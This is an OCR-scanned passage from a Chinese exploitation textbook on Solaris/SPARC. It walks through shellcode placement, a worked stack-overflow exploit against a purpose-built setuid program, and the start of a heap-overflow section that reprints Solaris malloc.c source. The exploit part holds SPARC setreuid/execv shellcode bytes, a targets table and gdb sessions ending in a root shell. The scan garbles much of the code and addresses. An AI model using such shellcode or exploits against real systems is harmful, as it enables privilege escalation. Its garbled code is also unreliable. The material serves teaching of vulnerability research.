shellcode， 也 可 以 非常 圆满 地 完成 破解 任务 。 如 果 有 可 能 的 话 ， 这 通常 是 最 好 的 选择 。 

在 破解 守护 程序 时 , 特别 是 远程 破解 时 , 在 栈 上 寻找 shellcode 并 执行 它 仍 是 一 个 不 错 的 选择 。 
缓冲 区 的 栈 地 址 会 因 环境 变量 或 程序 的 改变 稍微 有 点 改变 ， 因 此 通常 可 以 比较 准确 地 预计 它 。 对 
可 能 只 有 一 次 机 会 的 破解 来 说 ， 栈 地 址 由 于 其 好 的 可 预测 性 和 较 小 的 变化 ， 会 成 为 不 错 的 选择 。 

当 在 栈 上 找 不 到 合适 的 缓冲 区 或 栈 被 标 为 不 可 执行 时 , 堆 显 然 是 第 二 选择 。 如 果 我 们 可 以 在 
shellcode 周 围 注 入 大 量 的 填充 物 , 并 把 执行 流程 指向 堆 地 址 , 它 便 可 以 像 栈 缓冲 区 溢出 那样 可 靠 。 
然而 ， 在 大 多 数 情 况 下， 在 堆 上 寻找 shellcode 可 能 要 尝试 多 次 ， 要 想 可 靠 地 工作 ， 最 好 是 用 暴力 
猜测 的 方式 重复 尝试 攻击 。 不 可 执行 栈 的 系统 也 乐于 在 堆 上 执行 代码 ， 所 以 ， 对 破解 加 固 后 的 系 
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统 来 说 ， 这 是 很 好 的 选择 。 

在 SolariSPARC 上 ， 返 回 libc 式 的 攻击 通常 不 太 可 靠 ， 除 非 可 以 重复 攻击 ， 或 者 攻击 者 掌握 
目标 系统 函数 库 的 具体 知识 。Solaris/SPARC 有 多 种 版 本 的 函数 库 ， 远 多 于 其 他 的 商业 操作 系统 ， 
如 Windows。 期 望 把 libc 载 入 特殊 的 基地 址 是 不 合理 的 ， 因 为 每 个 重要 的 Solaris 发 行 版 都 可 能 有 一 
打 以 上 的 libc 版 本 。 对 本 地 攻击 来 说 ， 返 回 libe 的 攻击 因为 可 以 仔细 检查 函数 库 ， 所 以 能 可 靠 地 完 
成 。 如 果 攻 击 者 花 时 间 为 不 同 版 本 的 函数 库 创建 一 个 完整 的 函数 地 址 的 列表 ， 返 回 libc 的 方法 对 
于 远程 破解 来 说 也 许 是 可 行 的 。 

对 于 基于 字符 串 的 溢出 《复制 操作 止 于 空 字 节 ) 来 说 , 通常 不 可 能 把 执行 流程 重 定向 到 主 程 
序 的 可 执行 的 数据 部 分 。 许 多 程序 被 载 入 基地 址 0x00010000， 这 个 地 址 的 高 位 包含 空 字 节 。 在 
某 些 情况 下 ， 把 shellcode 注 入 函数 库 的 数据 部 分 是 可 能 的 ， 如 果 在 栈 或 堆 上 存储 shellcode 不 能 可 
靠 地 完成 破解 ， 那 么 可 以 尝试 一 下 这 个 方法 。 


10.5 ” 栈 溢 出 破解 实战 


实例 演示 可 以 使 Solaris/SPARC 上 基于 栈 的 破解 更 加 通俗 易 懂 。 下 面 使 用 本 章 提 到 的 方法 ， 
介绍 在 假定 的 Solaris 应 用 程序 里 怎样 破解 简单 的 栈 溢出 。 


10.5.1 脆弱 的 程序 
为 了 演示 怎样 破解 简单 的 栈 溢出 , 我 们 专门 写 了 这 个 脆弱 的 程序 。 它 不 太 复杂 ， 你 可 能 会 
真实 的 应 用 程序 里 发 现 它 的 身影 ， 然 而 ， 它 的 确 是 一 个 好 的 学 习 起 点 。 脆 弱 的 代码 如 下 ; 


int vulnerable_function(char *userinput) { 
char buf[64]; 
strcpy (buf, userinput); 
return 1; 





} 
在 这 个 例子 里 ，userinput 是 通过 命令 行 传递 的 第 一 个 参数 。 注 意 ， 这 个 程序 在 退出 前 有 两 
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键 的 寄存 器 是 第 15 个 保存 的 栈 指针 8fp， 位 于 寄存 器 窗口 偏 移 56B 处 。 因 此 ， 如 果 正 好 发 送 一 个 恰好 
是 136B 的 字符 串 作为 第 一 个 参数 ， 帧 指针 的 高 位 字 节 将 被 破坏 ， 导 致 程 序 月 省。 我 们 来 验证 一 下 。 

首先 ， 用 135B 长 的 字符 串 作为 第 一 个 参数 运行 程序 。 

# gdb ./stack_overflow 

GNU gdb 4.18 

Copyright 1998 Free Software Foundation, Ine. 

GDB is free software, covered by the GNU General Public License, and you 

are welcome to change it and/or distribute copies of it under certain 

conditions. 

Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "show warranty" for 

details. 

This GDB was configured as "sparc-sun-solaris2.8"...(no debugging 

symbols found)... 

(gdb) r "perl -e "print 'A' x 135"^ 

Starting program: /test/./stack overflow ‘perl -e "print 'A' x 135" 

(no debugging symbols found)...(no debugging symbols found)... (no 

debugging symbols found)... 

Program exited normally. 


可 见 , 当 改 写 对 程序 执行 影响 不 大 的 寄存 器 而 不 改动 帧 指针 和 指令 指针 时 , 程序 可 以 正常 退 
出 并 不 会 月 溃 。 
然而 ， 当 把 第 一 个 参数 再 加 上 一 个 字 节 时 ， 结 果 就 完全 不 同 了 。 


(gdb) r ‘perl -e "print 'A' x 136"^ 

Starting program: /test/./stack overflow “perl -e "print 'A' x 136"^ 
(no debugging symbols found)...(no debugging symbols found)...(no 
debugging symbols found]... 

Program received signal SIGSEGV, Segmentation fault. 

0x10704 in main () 

(gdb) x/i $pc 

0x10704 <main+88>: restore 

(gdb) print/x $fp 

$1 = Oxbffd28 

(gdb) print/x $i5 

$2 = 0x41414141 

(gdb) 


在 这 个 例子 里 ， 被 空 字 节 终 止 的 第 一 个 参数 改写 了 帧 指针 〈%i6 或 sfp) 的 高 位 字 节 。 正 如 
你 看 到 的 那样 ， 以 前 保存 的 寄存 器 %i5 被 A 破 坏 了 。 紧 跟 在 保存 的 帧 指针 后 面 的 是 保存 的 指令 指 
针 ， 改 写 保 存 的 指令 指针 将 导致 执行 任意 代码 。 我 们 知道 ， 字 符 串 的 大 小 古 改写 所 需要 的 关键 信 
息 ， 现 在 开始 准备 编写 破解 代码 吧 。 


10.5.2 ”破解 代码 


这 个 漏洞 的 破解 相对 比较 简单 。 用 足够 长 的 第 一 个 参数 执行 脆弱 的 程序 ， 以 此 触发 溢出 。 
为 这 是 本 地 破解 ， 我 们 可 以 完全 控制 环境 变量 ， 对 可 靠 地 执行 shellcode 来 说 ， 这 是 个 好 地 方 。 我 
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们 唯一 需要 的 是 shellcode 在 内 存 中 的 地 址 ， 以 编写 多 功能 的 破解 代码 。 
这 个 破解 代码 包含 一 个 目标 结构 , 详细 地 说 明了 不 同 平台 的 具体 信息 , 这 些 信 息 因 操 作 系统 
版 本 而 异 。 


struct { 
char *name; 
int length_until_fp; 
unsigned long fp_value; 
unsigned long pc_value; 
int align; 

} targets[] = { 


{ 
"Solaris 9 Ultra-Sparc", 
136, 
Oxffbf1238, 
Oxffbf1010, 
0 


un 

为 了 开始 改写 帧 指针 ， 这 个 结构 包含 必要 的 长 度 ， 以 及 用 于 改写 帧 指针 和 程序 计数 器 的 值 。 
破解 代码 本 身 简 单 地 构造 了 以 136 个 填充 字 节 开始 的 字符 串 ， 后 面 是 指定 的 帧 指针 和 程序 计数 器 
值 。 下 面 的 shellcode 是 破解 代码 的 一 部 分 ， 与 NOP 填充 物 一 起 放 在 程序 的 环境 变量 里 。 


static char setreuid_code[]= "\x90\x1d\xc0\x17" // xor %17, $17, %00 
"\x92\x1d\xc0O\x17" // xor $17, %17, %01 
"\x82\x10\x20\xca" // mov 202, $gi 
"\x91\xd0\x20\x08"; // ta 8 


static char shellcode[]="\x20\xbf\xff\xff" // bn,a scode - 4 
"\x20\xbf\xff\xff" // bn,a scode 
"\x7f\xff\xff\xff" // call scode + 4 
"\x90\x03\xe0\x20" // add $07, 32, $00 
"\x92\x02\x20\x08" // add $00, 8, $01 
"\xd0\x22\x20\x08" // st $00, [$00 + 8] 
"\xcO\x22\x60\x04" // st $gO, [$01 + 4] 
"\xcO\x2a\x20\x07" // stb $gO, [$00 + 7] 
"\x82\x10\x20\x0b" // mov 11, $g1 
"\x91\xd0\x20\x08" // ta 8 
"/bin/sh"; 


shellcode 执 行 setreuia(0，0) ， 首 先 把 用 户 ID 设 为 root， 接 着 运行 前 面 讨 论 过 的 execv 
shellcode. 

这 个 攻击 代码 的 第 一 次 运行 情况 如 下 所 示 : 

# gdb ./stack_exploit 

GNU gdb 4.18 
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Copyright 1998 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General Public License, and you 

Are welcome to change it and/or distribute copies of it under certain conditions. 
Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "sbow warranty" for details. 


This GDB was configured as "sparc-sun-solaris2.8"...(no debugging symbols found)... 
(gdb) r 0 

Starting program: /test/./stack_exploit 0 

(no debugging symbols found)...(no debugging symbols found)... (no 


debugging symbols found)... 

Program received signal SIGTRAP, Trace/breakpoint trap. 
Oxff3c29a8 in ?? () 

(gdb) c 

Continuing. 

Program received signal SIGILL, Illegal instruction. 
Oxffbf1018 in ?? () 

(gdb) 


这 段 破解 代码 看 起 来 和 预期 的 差不多 。 我 们 用 破解 里 指定 的 值 改写 了 程序 计数 器 ， 函数 一 返 
回 ， 执 行 就 被 转 到 那里 〈 我 们 改写 的 地 方 ) 去 了 。 在 那 时 ， 因 为 在 那个 地 址 执行 了 非法 指令 ， 程 
序 裔 溃 ， 但 我 们 现在 有 能 力 把 执行 流程 重 定 向 到 进程 空间 的 任意 地 址 。 因 此 ， 接 下 来 是 在 内 存 里 
寻找 shellcode， 并 把 执行 流程 重 定向 到 找到 的 地 址 。 

shellcode 应 该 非常 好 找 ， 因 为 我 们 使 用 了 大 量 类 似 NoP 的 指令 填充 它 ， 而 且 知道 它 在 程序 的 
环境 变量 里 ， 所 以 实际 上 它 应 该 在 栈 顶 周围 ， 因 此 在 栈 项 附近 寻找 。 


(gdb) x/128x $sp 


Oxffbf1238: 0x00000000 0x00000000 0x00000000 0x00000000 
Oxffbf1248: 0x00000000 0x00000000 0x00000000 0x00000000 
Oxffbf1258: 0x00000000 0x00000000 0x00000000 0x00000000 
Oxffbf1268: 0x00000000 0x00000000 0x00000000 0x00000000 
多 次 按 回 车 键 之 后 ， 我 们 在 栈 上 找到 一 些 东西 ， 看 起 来 很 像 要 找 的 shellcode。 
(gdb) 

Oxffbffc38: Ox2fff8018 Ox2Ffff8018 Ox2fff8018 Ox2fff8018 
Oxffbffc48: Ox2fff8018 Ox2fff8018 Ox2fff8018 Ox2fff8018 
Oxffbffc58: Ox2fff8018 Ox2fff8018 Ox2fff8018 Ox2fff8018 
Oxffbffc68: Ox2fff8018 Ox2fff8018 Ox2fff8018 Ox2fff8018 


这 些 重复 的 字 节 是 填充 的 指令 ， 在 栈 上 0oxffbffe44 处 。 不 过 ， 有 些 东 西 不 太 对 劲 ， 我 们 在 
破解 代码 里 并 没有 定义 下 面 这 样 的 空 操作 指令 : 

#define NOP "\x80\x18\x2f\xff" 

它们 在 以 4 字 节 对 齐 的 内 存 中 的 字 节 样式 是 \x2f\xff\x80\x18。 因为 SPARC 指 令 总 是 以 4B 对 
3r. 所 以 不 能 简单 地 把 改写 的 程序 计数 器 向 边界 外 再 调 2B， 这 可 能 会 直接 导致 Bus 故障 。 然而， 通 
过 向 环境 变量 里 增加 两 个 填充 字 节 , 我 们 就 可 以 正确 对 齐 shellcode， 从 而 正确 地 把 指令 以 4B 为 界 放 
置 。 随 着 修改 的 完成 ， 破 解 代码 指向 内 存 中 正确 的 位 置 ， 至 此 ， 应 该 可 以 执行 shell 了 。 


struct { 
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char *name; 

int length until fp; 
unsigned long fp value; 
unsigned long pc value; 
int align; 

} targets[] = { 


t 
"Solaris 9 Ultra-Sparc", 
136, 
Oxffbf1238, 
Oxffbffc38, 
2 
} 


}; 
校正 后 的 破解 代码 应 该 可 以 执行 shell 了 。 检 验 一 下 。 
$ uname -a 
SunOS unknown 5.9 Generic sun4u sparc SUNW,Ultra-5 10 
$ ls -al stack overflow 
-rwsr-xr-x 1 root other 6800 Aug 19 20:22 stack_overflow 
$ id 
- uid=60001 (nobody) gid=60001 (nobody) 
$ ./stack exploit 0 
* id 
uid=0 (root) gid=60001 (nobody) 
# 


这 个 例子 里 没有 前 面 提 到 的 复杂 因素 , 因此 特别 适合 用 于 讲解 这 类 破解 。 比较 幸运 吧 , 不 过 ， 
大 多 数 基于 栈 溢出 的 破解 应 该 都 不 太 复杂 。 在 本 书 配套 网 站 可 以 找到 这 个 漏洞 和 破解 的 源 代码 
(stack_overflow.c#lstack_exploit.c). 


10.6 Solaris/SPARC 上 的 堆 溢 出 


在 现代 漏洞 研究 领域 内 , 堆 溢 出 比 栈 溢 出 可 能 更 为 普遍 。 一 般 情 况 下 都 可 以 可 靠 地 破解 它们 ; 
当然 ， 可 靠 性 肯定 还 是 不 及 栈 溢出 。 挫 不 像 栈 那样 ， 堆 上 并 没有 明确 保存 与 执行 流 有 关 的 信息 。 
. 对 堆 溢 出 攻击 来 说 , 通常 有 两 个 方法 执行 代码 。 攻击 者 既 可 以 党 试 改写 程序 保存 在 堆 上 的 特 

殊 数据 , 也 可 以 破坏 堆 的 控制 结构 。 不 是 所 有 的 堆 实现 都 直接 在 堆 上 保存 控制 结构 , 不 过 , Solaris 
System V 的 堆 实 现 是 这 样 做 的 。 

栈 溢 出 一 般 分 成 两 个 步骤 。 第 一 步 是 实际 的 溢出 ， 改 写 保 存 的 程序 计数 器 。 第 二 步 是 返回 ， 
跳 到 内 存 中 的 任意 位 置 。 堆 溢出 则 不 同 ， 破 坏 控制 结构 的 堆 溢出 通常 分 成 三 个 步 又。 第 一 步 当然 
是 溢出 ， 改 写 控制 结构 。 第 二 步 是 堆 实现 处 理 被 破坏 的 控制 结构 ， 改 写 任意 内 存 。 最 后 一 步 是 执 
行 一 些 跳 转 到 内 存 中 指定 位 置 的 操作 , 可 能 调用 一 个 函数 指针 或 用 一 个 改变 后 保存 的 指令 指针 返 
回 。 额 外 的 措施 会 增加 一 定 程度 的 不 可 靠 性 ， 使 堆 溢 出 的 过 程 更 加 复杂 。 为 了 可 靠 地 破解 它们 ， 
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必须 不 断 地 尝试 或 学 习 目 标 系统 的 具体 知识 。 

如 果 程 序 的 特殊 信息 保存 在 堆 上 ， 而 且 离 溢出 点 不 远 ， 那 么 通常 来 说 ， 改 写 它 比 改 写 控制 结 
构 更 值得 。 最 好 的 改写 目标 当然 是 函数 指针 了 ， 如 果 能 改写 其 中 的 一 个 ， 这 个 方法 将 比 改写 控制 
结构 更 可 靠 。 
10.6.1 Solaris System V 堆 介 绍 

Solaris 的 堆 实现 基于 自 调整 的 二 又 树 ， 通 过 块 大 小 来 排序 。 这 导致 堆 的 实现 相当 复杂 ， 从 而 
产生 车 干 个 破解 方法 。 参照 多 个 其 他 的 堆 实 现 的 样子 ， 块 的 位 置 和 大 小 以 8B 为 界 对 齐 。 如 果 当 前 
块 在 使 用 中 ， 则 块 大 小 的 最 低位 被 保留 ， 如 果 在 内 存 中 的 前 一 块 是 空闲 的 ， 则 第 二 个 最 低位 将 被 
保留 。 

free () RIK ( free unlocked) 本 身 实际 上 什么 也 没 做 ， 所 有 与 释放 内 存 块 相关 的 操作 都 
由 一 个 名 为 realfree() 的 函数 执行 。free() 函数 只 对 被 释放 的 块 执行 一 些 细微 的 合乎 情理 的 检 
查 ， 然 后 把 它 放 到 空闲 列表 里 ， 稍 后 将 对 它 进 行 处 理 。 当 空闲 列表 满 了 ， 或 者 malloc/realloc 
被 调用 时 ， 函 数 将 调用 cleanfree() 刷 新 空闲 列表 。 

Solaris 的 堆 实 现 执 行 大 多 数 堆 实现 的 常见 操作 。 在 必要 时 ， 通 过 sbrk 系 统 调用 增加 扒 空 间 ， 
在 可 能 时 ， 会 把 相 邻 的 空闲 块 合并 在 一 起 。 


10.6.2 ” 堆 的 树 状 结构 - 
对 于 破解 堆 溢出 来 说 , 没有 必要 理解 Solaris 堆 的 树 状 结构 ; 然而 , 如 果 除 了 最 简单 的 方法 外 ， 
你 还 想 研 究 其 他 的 方法 ， 最 好 能 掌握 树 状 结构 。 在 普通 的 Solaris libc 里 ， 堆 实现 的 全 部 源码 如 下 。 
第 一 个 源码 是 malloc .c， 第 二 个 源码 是 mallint .h。 
/* Copyright (c) 1988 AT&T */ 


/* All Rights Reserved */ 


/* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF AT&T */ 
/* The copyright notice above does not evidence any */ 
/* actual or intended publication of such source code. */ 


* Copyright (c) 1996, by Sun Microsystems, Inc. 
* All rights reserved. 


*/ 
#pragma ident "@(#)malloc.c 1.18 98/07/21 SMI" /* Svr4.0 1.30 */ 
/ *LINTLIBRARY*/ 

/* 

* Memory management: malloc(), realloc(), free(). 


* 


* The following #-parameters may be redefined: 
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* SEGMENTED: if defined, memory requests are assumed to be 
non-contiguous across calls of GETCORE's. 

* GETCORE: a function to get more core memory. If not SEGMENTED, 
GETCORE(0) is assumed to return the next available 
address. Default is 'sbrk'. 

* ERRCORE: the error code as returned by GETCORE. 

Default is (char *)(-1). 

* CORESIZE: a desired unit (measured in bytes) to be used 

with GETCORE. Default is (1024*ALIGN). 


* This algorithm is based on a best fit strategy with lists of 


* 


* 


* 


free elts maintained in a Self-adjusting binary tree. Each list 
contains all elts of the same size. The tree is ordered by size.. 
For results on self-adjusting trees, see the paper: 


Self-Adjusting Binary Trees, 
DD Sleator & RE Tarjan, JACM 1985. 


* The header of a block contains the size of the data part in bytes. 
* Since the size of a block is 0%4, the low two bits of the header 


* are free and used as follows: 


* 


* 


BITO: 1 for busy (block is in use), 0 for free. 
BITi: if the block is busy, this bit is 1 if the 


preceding block in contiguous memory is free. 
Otherwise, it is always 0. 


*/ 
#include "synonyms.h" 

#include «mtlib.h» 

#include <sys/types.h> 

#include <stdlib.h> 

#include <string.h> 

#include «limits.h» 

#include "mallint.h" 

static TREE *Root, /* root of the free tree */ 

*Bottom, /* the last free chunk in the arena */ 

* morecore(size t); /* function to get more core */ 
static char *Baddr; /* current high address of the arena */ 
static char *Lfree; /* last freed block with data intact */ 
static void t_delete(TREE *); 
static void t splay(TREE *); 

Static void  realfree(void *); 

static void cleanfree(void *); 

static void * malloc unlocked(size t); 

#define FREESIZE (1<<5) /* size for preserving free blocks until 


next malloc 


*/ 
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#define FREEMASK FREESIZE-1 
Static void *flist[FREESIZE]; /* list of blocks to be freed on next malloc */ 
Static int freeidx; /* index of free blocks in flist $ FREESIZE */ 
/* 
* Allocation of small blocks 
*/ 


Static TREE  *List[MINSIZE/WORDSIZE-1]; /* lists of small blocks */ 


Static void * 
_smalloc(size_t size) 
{ 
TREE *tp; 
size_t i; 


ASSERT(size % WORDSIZE == 0); 
/* want to return a unique pointer on malloc(0) */ 
if (size == 0) 

size = WORDSIZE; 


/* list to use */ 
i = size / WORDSIZE - 1; 


if (List[i] == NULL) { 
TREE *np; 
int n; 
/* number of blocks to get at one time */ 
#define NPS (WORDSIZE*8) 


ASSERT((size + WORDSIZE) * NPS >= MINSIZE); 


/* get NPS of these block types */ 
if ((List[i] = _malloc_unlocked({ (size + WORDSIZE) * NPS)) == 0) 


return (0); 


/* make them into a link list */ 
for (n = 0, np = List[i]; n < NPS; ++n) ( 
tp = np; 
SIZE(tp) = size; 
np = NEXT(tp); 
AFTER(tp) = np; 
} 
AFTER(tp) = NULL; 


/* allocate from the head of the queue */ 
tp = List[il; 

List[i] = AFTER(tp); 

SETBITO(SIZE(tp) ); 
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return (DATA(tp)); 





} 

void * 

malloc(size_t size) 

{ 
void *ret; 
(void) _mutex_lock(&__malloc_lock); 
ret = malloc unlocked(ísize); 
(void) _mutex_unlock(&__malloc_lock); 
return (ret); 

} 


static void * 
_malloc_unlocked(size_t size) 
{ 

size t n; 

TREE *tp, *sp; 

Size t o_bitl; 


COUNT (nmalloc); 
ASSERT(WORDSIZE -- ALIGN); 


/* make sure that size is 0 mod ALIGN */ 
ROUND (size); 
/* see if the last free block can be used */ 
if (Lfree) { 

sp = BLOCK (Lfree) ; 

n = SIZE(sp); 

CLRBITSO1 (n); 


if (n == size) ( 
/* 
* exact match, use it as is 
*/ 
freeidx = (freeidx + FREESIZE - 1) & 


FREEMASK; /* 1 back */ 
flist[freeidx] - Lfree - NULL; 
return (DATA(sp)); 

) else if (size »- MINSIZE && n » size) ( 


/* 
* got a big enough piece 
*/ 
freeidx = (freeidx + FREESIZE - 1) & 


FREEMASK; /* 1 back */ 
flist[freeidx] - Lfree - NULL; 
o bitl = SIZE(sp) & BIT1; 
SIZE(sp) - n; 
goto leftover; 
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} 
o_biti = 0; 


/* perform free's of space since last malloc */ 
cleanfree (NULL); 


/* small blocks */ 
if (size < MINSIZE) 


return (_smalloc(size)); 


/* search for an elt of the right size */ 


sp = NULL; 
n = 0; 
if (Root) { 
tp = Root; 
while (1) { 
/* branch left */ 
if (SIZE(tp) >= size) { 
if (n == || n >= SrzzE(tp)) { 
sp = tp; 
n = SIZE(tp); 
} 
if (LEFT (tp) ) 
tp = LEFT (tp); 
else 
break; 
} else { /* branch right */ 
if (RIGHT(tp)) 
tp - RIGHT(tp); 
else 
break; 
} 
} 
if (sp) ( 
t delete(sp); 
) else if (tp !- Root) ( 
/* make the searched-to element the root */ 
t splay(tp); 
Root - tp; 
} 
} 
/* if found none fitted in the tree */ 
if (!sp) { 


if (Bottom && size «- SIZE(Bottom)) ( 
Sp - Bottom; 
CLRBITSO1(SIZE(sp)); 
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) else if ((sp = morecore(size)) == NULL) /* no more memory */ 
return (NULL); 


/* tell the forward neighbor that we're busy */ 
CLRBITi(SIZE(NEXT(sp))); 


ASSERT (ISBITO (SIZE(NEXT(sp)))); 


leftover: 
/* if the leftover is enough for a new free piece */ 
if ((n = (SIZE(sp) - size)) >= MINSIZE + WORDSIZE) { 
n -= WORDSIZE; 
SIZE(sp) = size; 


tp = NEXT(sp); 
SIZE(tp) = n|BITO; 
realfree(DATA(tp)); 
) else if (BOTTOM(sp) } 
Bottom = NULL; 


/* return the allocated space */ 
SIZE(sp) |= BITO | o biti; 
return (DATA(sp)); 


/* 

* realloc(). 

* 

* If the block size is increasing, we try forward merging first. 
* This is not best-fit but it avoids some data recopying. 





*/ 
void * 
realloc(void *old, size t size) 
t 
TREE *tp, *np; 
size t ts; 
char *new; 


COUNT (nrealloc); 


/* pointer to the block */ 

(void) mutex lock(& malloc lock); 

if (old == NULL) { 
new - , malloc unlocked(size); 
(void) mutex unlock(& malloc lock); 
return (new); 


/* perform free's of space since last malloc */ 
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cleanfree(old); 


/* make sure that size is 0 mod ALIGN */ 


ROUND(size); 
tp - BLOCK(old); 
ts - SIZE(tp); 


/* if the block was freed, data has been destroyed. */ 
if (!ISBITO(ts)) ( 

(void) _mutex unlock(& malloc lock); 

return (NULL); 


/* nothing to do */ 

CLRBITSO1(SIZE(tp)); 

if (size -- SIZE(tp)) ( 
SIZE(tp) = ts; 
(void) mutex unlock(&  malloc lock); 
return (old); 


/* special cases involving small blocks */ 
if (size « MINSIZE || SIZE(tp) « MINSIZE) 
goto call malloc; 


/* block is increasing in size, try merging the next block */ 
if (size > SIZE(tp)) í 
np = NEXT(tp); 
if (!ISBITO(SIZE(np))) { 
ASSERT(SIZE(np) >= MINSIZE); 
ASSERT (!ISBIT1(SIZE(np))); 
SIZE(tp) += SIZE(np) + WORDSIZE; 
if (np != Bottom) 
t_delete(np); 
else 
Bottom = NULL; 
CLRBIT1(SIZE(NEXT(np))); 


#ifndef SEGMENTED 


/* not enough & at TRUE end of memory, try extending core */ 


if (size » SIZE(tp) && BOTTOM(tp) && GETCORE(0) -- Baddr) ( 
Bottom - tp; 
if ((tp = morecore(size)) == NULL) { 


tp = Bottom; 
Bottom = NULL; 
} 
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#endif 
} 


/* got enough space to use */ 
if (size <= SIZE(tp)) { 
size_t n; 


chop_big: 

if ((n = (SIZE(tp) - size)) >= MINSIZE + WORDSIZE) 
n -= WORDSIZE; 
SIZE(tp) = size; 
np = NEXT (tp); 
SIZE(np) = n|BITO; 
realfree(DATA(np))!; 

) else if (BOTTOM(tp)) 
Bottom - NULL; 


/* the previous block may be free */ 
SETOLDO1 (SIZE (tp), ts); 

(void) _mutex_unlock(&__malloc_lock); 
return (old); 


/* call malloc to get a new block */ 


call malloc: 
SETOLDO1(SIZE(tp), ts); 


if ((new =  malloc unlocked(size)) != NULL) ( 
CLRBITSO1(ts); 
if (ts > size) 
ts = size; 
MEMCOPY (new, old, ts); 
_free_unlocked(old); 


{ 
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* 4. MINSIZE <= SIZE(tp) < size 


* If the previous block is free and the combination of 

* these two blocks has at least size bytes, then merge 

* the two blocks copying the existing contents backwards. 
*/ 


CLRBITSO1(SIZE(tp)); 
if (SIZE(tp) « MINSIZE) { 
if (size < SIZE(tp)) { /* case 1. */ 
SETOLDOL(SIZE(tp), ts); 
(void) mutex unlock(&  malloc lock); 
return (old); 
) else if (size < MINSIZE) { /* case 2. */ 
size = MINSIZE; 
goto call_malloc; 
} 
} else if (size < MINSIZE) { /* case 3. */ 
size = MINSIZE; 
goto chop_big; 
) else if (ISBIT1(ts) && 
(SIZE(np = LAST(tp)) + SIZE(tp) + WORDSIZE) >= size) ( 
ASSERT(!ISBITO(SIZE(np))); 
t delete(np):; 
SIZE(np) += SIZE(tp) + WORDSIZE; 
/* 
* Since the copy may overlap, use memmove() if available. 
* Otherwise, copy by hand. 
*/ 
(void) memmove(DATA(np), old, SIZE(tp)); 
old - DATA(np); 
tp = np; 
CLRBIT1 (ts); 
goto chop_big; 
} 
SETOLDO1(SIZE(tp), ts); 
(void) _mutex_unlock(&__malloc_lock); 
return (NULL); 


* realfreel). 


* Coalescing of adjacent free blocks is done first. 

* Then, the new free block is leaf-inserted into the free tree 

* without splaying. This strategy does not guarantee the amortized 
* O(nlogn) behavior for the insert/delete/find set of operations 

* on the tree. In practice, however, free is much more infrequent 
* than malloc/realloc and the tree searches performed by these 

* functions adequately keep the tree in balance. 

*/ 
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static void 

realfree(void *old) 

{ 
TREE *tp, *sp, *np; 
size_t ts, size; 


COUNT (nfree) ; 


/* pointer to the block */ 
tp = BLOCK(old); 
ts = SIZE(tp); 
if (!ISBITO(ts)) 

return; 
CLRBITSO1(SIZE(tp)); 


/* small block, put it in the right linked list */ 
if (SIZE(tp) < MINSIZE) { 

ASSERT(SIZE(tp) / WORDSIZE >= 1); 

ts = SIZE(tp) / WORDSIZE - 1; 

AFTER(tp) = List[ts]; 

List[ts] = tp; 

return; 


/* see if coalescing with next block is warranted */ 
np - NEXT(tp); 
if (!ISBITO(SIZE(np))) { 
if (np != Bottom) 
t_delete(np); 
SIZE(tp) += SIZE(np) + WORDSIZE; 
} 


/* the same with the preceding block */ 
if (ISBIT1(ts)) { 
np - LAST(tp); 
ASSERT (!ISBITO(SIZE(np))); 
ASSERT(np != Bottom); 
t_delete(np); 
SIZE(np) += SIZE(tp) + WORDSIZE; 
tp = np; 


/* initialize tree info */ 
PARENT(tp) - LEFT(tp) - RIGHT(tp) - LINKFOR(tp) - NULL; 


/* the last word of the block contains self's address */ 
*(SELFP(tp)) = tp; 


/* get bottom block, or insert in the free tree */ 
if (BOTTOM(tp)) 
Bottom - tp; 
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else { 
/* search for the place to insert */ 
if (Root) { 
size = SIZE(tp); 
np = Root; 
while (1) { 
if (SIZE(np) > size) { 
if (LEFT (np) ) 
np = LEFT (np); 
else { 
LEFT (np) = tp; 
PARENT (tp) = np; 
break; 
} 
) else if (SIZE(np) < size) { 
if (RIGHT(np)) 
np - RIGHT(np); 


else ( 
RIGHT(np) - tp; 
PARENT(tp) - np; 
break; 
} 
} else { 
if ((sp = PARENT(np)) != NULL) 
if (np == LEFT(sp) ) 
LEFT (sp) = tp; 
else 
RIGHT(sp) = tp; 
PARENT (tp) = Sp; 
} else 
Root = tp; 


/* insert to head of list */ 
if ((sp = LEFT(np)) 
PARENT(sp) = tp; 


LEFT (tp) = sp; 


if ((sp = RIGHT(np)) 
PARENT (sp) = tp; 


RIGHT (tp) = sp; 


/* doubly link list */ 


LINKFOR (tp) = np; 
LINKBAK (np) = tp; 
SETNOTREE (np) ; 


break; 


} else 





{ 


1= NULL) 


l= NULL) 
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/* tell next block that this one is free */ 
SETBIT1 (SIZE(NEXT(tp))); 


ASSERT (ISBITO (SIZE (NEXT (tp)))); 


/* 
* Get more core. Gaps in memory are noted as busy blocks. 
*/ 

Static TREE * 

—morecore(size t size) 


{ 
TREE *tp; 
size_t n, offset; 
char *addr; 
size_t nsize; 


/* compute new amount of memory to get */ 
tp = Bottom; 

n = size + 2 * WORDSIZE; 

addr = GETCORE(0); 


if (addr == ERRCORE) 
return (NULL); 


/* need to pad size out so that addr is aligned */ 


if ((((size t)addr) % ALIGN) !- 0) 

offset - ALIGN - (size t)addr $ ALIGN; 
eise 

offset - 0; 


#ifndef SEGMENTED 
/* if not segmented memory, what we need may be smaller */ 
if (addr == Baddr) { 
n -= WORDSIZE; 
if (tp !- NULL) 
n -- SIZE(tp); 





} 
#endif 


/* get a multiple of CORESIZE */ 
n= ((m - 1) / CORESIZE + 1) * CORESIZE; 


nsize = n + offset; 


if (nsize == ULONG_MAX) 
return (NULL); 


if (msize <= LONG MAX) { 
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if (GETCORE(nsize) == ERRCORE) 
return (NULL); 
} else { 
intptr_t delta; 
/* 


* the value required is too big for GETCORE() to deal with 
* in one go, so use GETCORE() at most 2 times instead. 
*/ 
delta = LONG_MAX; 
while (delta > 0) ( 
if (GETCORE(delta) == ERRCORE) { 
if (addr != GETCORE(0)) 
(void) GETCORE(-LONG, MAX); 
return (NULL); 
} 
nsize -= LONG_MAX; 
delta = nsize; 


/* contiguous memory */ 
if (addr == Baddr) { 


ASSERT (offset == 0); 
if (tp) { 

addr = (char *)tp; 

n += SIZE(tp) + 2 * WORDSIZE; 
} else { 


addr = Baddr - WORDSIZE; 
n += WORDSIZE; 
} 
} else 
addr += offset; 
/* new bottom address */ 
Baddr = addr + n; 


/* new bottom block */ 

tp = (TREE *)addr; 

SIZE(tp) = n - 2 * WORDSIZE; 
